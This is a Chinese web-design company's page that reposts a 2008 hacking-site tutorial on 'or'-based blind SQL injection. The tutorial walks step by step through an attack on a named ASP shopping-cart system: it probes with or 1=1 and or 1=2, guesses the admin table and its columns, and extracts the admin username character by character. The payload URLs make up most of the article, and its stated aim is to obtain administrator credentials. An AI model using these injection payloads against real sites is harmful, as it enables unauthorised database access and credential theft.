青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 脚本安全 >> 正文  
新Or 1=1的脚本注入技术详解

文章来源: 西宁威势电子信息服务有限公司     发布时间:2008-12-21    浏览次数:8878    tags:Or 1=1 注入

记得一年前火狐有一位朋友问,如果一个站过滤了and和"’"的话,改怎么注入啊?当时我随口说了句"or注入",后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。 
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典哦,呵呵。 
我们来构造测试语句:
vpro.asp?id=1 or exists(select * from admin) 
返回错误页面,说明存在admin表我们来换一个表试试!
vpro.asp?id=1 or exists(select * from n0h4ck) 
说明不存在n0h4ck这个表。 
我们继续来,构造语句
vpro.asp?id=1 or exists(select admin from admin) 
返回or 1=1的页面,说明admin表存在admin字段。
vpro.asp?id=1 or exists(select padd from admin) 
返回or 1=2的页面,说明admin表不存在padd字段。 
我们现在开始猜测数据了,
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’n’ 
返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是"n"。 
我们再来
vpro.asp?id=1 or (select mid(admin,1,1) from admin)=’a’ 
返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是"a",我们第一个会想到什么呢?当然是"admin"啦。 
我们用left函数确定一下,
vpro.asp?id=1 or (select left(admin,5) from admin)=’admin’ 
猜测正确,的确是admin,好了,后面的话就不用我说了吧!

本篇文章来源于 黑客天下 原文链接:http://www.hack4.com/article/hack4-10952.html
上一篇:利用AJAX技术偷取COOKIES
下一篇:[原创]ASP后门代码
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全